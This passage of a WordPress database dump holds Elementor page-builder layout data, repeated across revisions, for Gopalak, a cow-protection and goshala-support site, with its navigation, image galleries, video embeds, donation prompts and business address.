Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10865,1810,'_elementor_page_assets','a:0:{}'),(10867,1811,'_elementor_edit_mode','builder'),(10868,1811,'_elementor_template_type','wp-page'),(10869,1811,'_elementor_version','3.7.8'),(10870,1811,'_wp_page_template','elementor_canvas'),(10871,1811,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10872,1811,'_elementor_page_assets','a:0:{}'),(10874,1812,'_elementor_edit_mode','builder'),(10875,1812,'_elementor_template_type','wp-page'),(10876,1812,'_elementor_version','3.7.8'),(10877,1812,'_wp_page_template','elementor_canvas'),(10878,1812,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_